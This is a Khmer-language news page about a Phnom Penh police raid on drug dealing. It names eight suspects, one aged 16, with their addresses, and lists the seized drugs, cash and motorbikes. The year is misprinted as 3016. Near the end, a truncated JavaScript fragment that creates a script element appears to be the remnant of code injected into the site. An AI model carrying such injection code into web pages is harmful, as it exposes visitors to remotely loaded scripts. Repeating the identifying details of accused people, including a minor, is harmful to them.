ព្រឹតិ្តការណ៍ថ្មីៗ

បង្រ្កាបករណីជួញដូរ និងប្រើប្រាស់ដោយខុសច្បាប់នូវសារធាតុញៀន នៅប្លុករោងចក្រឆ្នាំង សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក

2 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ៖ នៅថ្ងៃទី០១-០៦-៣០១៦ វេលាម៉ោង ២:២៥នាទី រំលងអាធ្រាត្រ កំលាំងផ្នែកនគរបាលយុត្តិធម៌ខណ្ឌទួលគោក បានសហការ ជាមួយកំលាំងនគរបាលប៉ុស្តិ៍បឹងកក់ទី២ និងកំលាំងកងអនុសេនា តូចអន្តរាគមមន៍ ពិសេស នៃស្នងការដ្ឋាននគរបាលរាជធានីភ្នំពេញ បាន ចុះបង្រ្កាបសកម្មភាពជួញដូរ និងប្រើប្រាស់ដោយខុសច្បាប់នូវ សារធាតុញៀន នៅប្លុក រោងចក្រឆ្នាំង ផ្លូវរថភ្លើង ក្រុម១០១ ភូមិ២១ សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ ដោយឃាត់ខ្លួន ជនសង្ស័យបានចំនួន ០៨នាក់ ៖
១-ឈ្មោះ រឿង ជ័យរិទ្ធ ហៅ រិទ្ធត្រេន ភេទប្រុស អាយុ ៣៤ឆ្នាំ មុខរបរ គ្មាន ស្នាក់នៅផ្ទះ ជួល សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ។
២-ឈ្មោះ រឿង សារ៉ាត់ ហៅខ្ទើយ ភេទប្រុស អាយុ ២៣ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ពុំពិតប្រាកដ ស្នាក់នៅផ្ទះ ជួល ផ្លូវរថភ្លើង សង្កាត់បឹងកក់ទី១ ខណ្ឌទួលគោក ។
៣-ឈ្មោះ ជាង ហេង ភេទប្រុស អាយុ ១៦ឆ្នាំ មុខរបរគ្មានស្នាក់នៅ
កុដិលេខ១០ វត្តនាគវ័ន សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក ។
៤-ឈ្មោះ កែវ ប្រាក់ពូន ភេទប្រុស អាយុ២១ឆ្នាំ មុខរបរគ្មាន ស្នាក់នៅផ្ទះជួល ផ្លូវរថភ្លើង សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ ។
៥-ឈ្មោះ ឡឹក បញ្ញា ភេទប្រុស អាយុ ២៤ឆ្នាំ មុខរបរហាត់ប្រដាល់ ស្នាក់នៅក្លឹបប្រដាល់ឃ្លាំងមឿនកីឡា សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ ។
៦-ឈ្មោះ ធី វុធ ភេទប្រុស អាយុ ២១ឆ្នាំមុខរបរគ្មានស្នាក់នៅចល័ត ដេកតាមផ្លូវរថភ្លើង សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក ។
៧-ឈ្មោះ យឿន ប៉ង់ ភេទប្រុស អាយុ ២១ឆ្នាំ មុខរបរបើកបររថយន្ត ស្នាក់ផ្ទះពុំចាំលេខ ផ្លូវលេខ១៩៨៦ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។
៨-ឈ្មោះ ចាន់ វណ្ណៈ ភេទប្រុស អាយុ ២១ឆ្នាំ មុខរបរគ្មានស្នាក់នៅ ស្រុកទ្រាំង ខេត្តតាកែវ ។
វត្ថុតាងចាប់យក ៖ក្រាមពណ៌សថ្លា ចំនួន ៣៧កញ្ចប់ ( ៣៦កញ្ចប់តូច,០១កញ្ចប់ធំ )ចាប់យកពីឈ្មោះ ជាង ហេង២៦កញ្ចប់ ធំ០១តូច ២៥ ,ចាប់យកពីឈ្មោះ រឿង សារ៉ាត់ ហៅ អាខ្ទើយ ០៩កញ្ចប់តូច , ចាប់យកពីឈ្មោះ កែវ ប្រាក់ពូន ០១កញ្ចប់ តូច និងចាប់យកពីឈ្មោះ ចាន់ វណ្ណៈ ០១កញ្ចប់តូច ។
លុយចំនួន ២៤ម៉ឺនរៀល ថង់សម្រាប់ច្រកគឿងញៀន មួយចំនួន ម៉ូតូ០២គ្រឿងម៉ាក Honda Airblade គ្មានស្លាកលេខ និងម៉ាក Honda C125 ពណ៌ខ្មៅ ស៊េរី2016 ពាក់ស្លាកលេខភ្នំពេញ 1FL-4935 ។
បច្ចុប្បន្នជនសង្ស័យទាំង០៨នាក់ កំពុងឃាត់ខ្លួន នៅអធិការដ្ឋាននគរបាលខណ្ឌទួលគោក ដើម្បីសាកសួរ និងកសាងសំណុំរឿង បញ្ជូនទៅសាលាដំបូងរាជ ធានីភ្នំពេញ ចាត់ការតាមផ្លូវច្បាប់។

11872305_10153513108267508_7760316066293043812_o 13322183_918527154940954_5554056114469932779_n 13339580_918527254940944_2349803441484398072_nvar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!